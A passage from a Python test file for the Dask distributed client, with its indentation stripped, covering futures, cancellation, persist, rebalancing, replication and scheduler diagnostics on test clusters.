x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 5
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
await wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_differnet_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
from dask.delayed import delayed, Delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = await c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = await c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
await wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
await c.cancel([x])
with pytest.raises(CancelledError):
await x
with pytest.raises(CancelledError):
await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
await wait([x])
x.__del__() # trigger garbage collection
await asyncio.sleep(0)
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
await asyncio.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
y = c.submit(inc, 2)
await wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
results = await c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = await c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = await c.run_on_scheduler(func)
assert results == func()
results = await c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
results = await c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
await c.run(throws, 1)
results = await c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
def test_run_exception(c):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type, match="informative message"):
c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
await wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_test()
async def test_worker_aliases():
s = await Scheduler(validate=True, port=0)
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
await asyncio.gather(a, b, w)
c = await Client(s.address, asynchronous=True)
L = c.map(inc, range(10), workers="alice")
future = await c.scatter(123, workers=3)
await wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = await c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
await c.close()
await asyncio.gather(a.close(), b.close(), w.close())
await s.close()
def test_persist_get_sync(c):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
await asyncio.sleep(0.5)
result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
psutil = pytest.importorskip("psutil")
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 4
@gen_cluster()
async def test_startup_close_startup(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c = await Client(s.address, asynchronous=True)
await c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
try:
result = await x
except Exception as e:
assert "hello world" in str(e)
else:
assert False
@gen_cluster(client=True)
async def test_rebalance(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[b.address]
x, y = await c.scatter([1, 2], workers=[a.address])
assert len(a.data) == 2
assert len(b.data) == 0
s.validate_state()
await c.rebalance()
s.validate_state()
assert len(b.data) == 1
assert {ts.key for ts in bws.has_what} == set(b.data)
assert bws in s.tasks[x.key].who_has or bws in s.tasks[y.key].who_has
assert len(a.data) == 1
assert {ts.key for ts in aws.has_what} == set(a.data)
assert aws not in s.tasks[x.key].who_has or aws not in s.tasks[y.key].who_has
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 4, client=True)
async def test_rebalance_workers(e, s, a, b, c, d):
w, x, y, z = await e.scatter([1, 2, 3, 4], workers=[a.address])
assert len(a.data) == 4
assert len(b.data) == 0
assert len(c.data) == 0
assert len(d.data) == 0
await e.rebalance([x, y], workers=[a.address, c.address])
assert len(a.data) == 3
assert len(b.data) == 0
assert len(c.data) == 1
assert len(d.data) == 0
assert c.data == {x.key: 2} or c.data == {y.key: 3}
await e.rebalance()
assert len(a.data) == 1
assert len(b.data) == 1
assert len(c.data) == 1
assert len(d.data) == 1
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_execution(c, s, a, b):
futures = c.map(inc, range(10), workers=a.address)
await c.rebalance(futures)
assert len(a.data) == len(b.data) == 5
s.validate_state()
def test_rebalance_sync(c, s, a, b):
futures = c.map(inc, range(10), workers=[a["address"]])
c.rebalance(futures)
has_what = c.has_what()
assert len(has_what) == 2
assert list(valmap(len, has_what).values()) == [5, 5]
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await asyncio.sleep(0.1)
await c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_missing_data(c, s, a, b):
with pytest.raises(ValueError, match="keys were found to be missing"):
futures = await c.scatter(range(100))
keys = [f.key for f in futures]
del futures
await c.rebalance(keys)
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
await x
await a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
await asyncio.sleep(0.01)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
await x
await a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
await asyncio.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = await Worker(s.address, loop=s.loop)
start = time()
while x.status != "finished":
assert time() < start + 2
await asyncio.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = await x
assert result == 2
await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = await Nanny(s.address, nthreads=2, loop=s.loop, port=0)
await c.gather(futures)
await n.close()
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
await y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
await x
await c.cancel(x)
with pytest.raises(CancelledError):
c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
[a, b] = await c.scatter([1, 2])
await s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
await c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
await c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
[a, b] = await c.scatter([1, 2], workers=[workers[0].address])
await s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
await s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
await s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
await s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
class CountSerialization:
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = await c.scatter([obj])
await s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
await c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
await c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
await c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
timeout=None,
)
async def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
await wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
await client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
await client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
await wait(future)
assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
await wait(futures)
assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
await wait([x, y])
futures = c.map(inc, range(2, 11))
await wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
await wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
await wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = await c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
await asyncio.sleep(0.01)
await c.cancel(x)
start = time()
while any(v for w in s.workers.values() for v in w.processing):
assert time() < start + 0.2
await asyncio.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
processing = await c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
await asyncio.sleep(0.2)
x = await c.processing()
assert set(x) == {a.address, b.address}
x = await c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
x = await c.scheduler.ncores()
assert x == s.nthreads
x = await c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = await c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = await c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = await c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = await c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = await c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = await c.scatter(3, workers=[v.address])
await wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
await u.close()
await v.close()
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with pytest.raises(KilledWorker) as info:
await f
assert info.value.last_worker.nanny in {a.address, b.address}
await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True)
async def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
await c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert key not in c.refcount
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_test()
async def test_status():
s = await Scheduler(port=0)
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
await s.close()
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(tokey, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(tokey(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli) as s:
c = Client("127.0.0.1:9393", loop=loop)
start = time()
while len(c.nthreads()) != 1:
sleep(0.1)
assert time() < start + 3
x = c.submit(inc, 1)
assert x.result() == 2
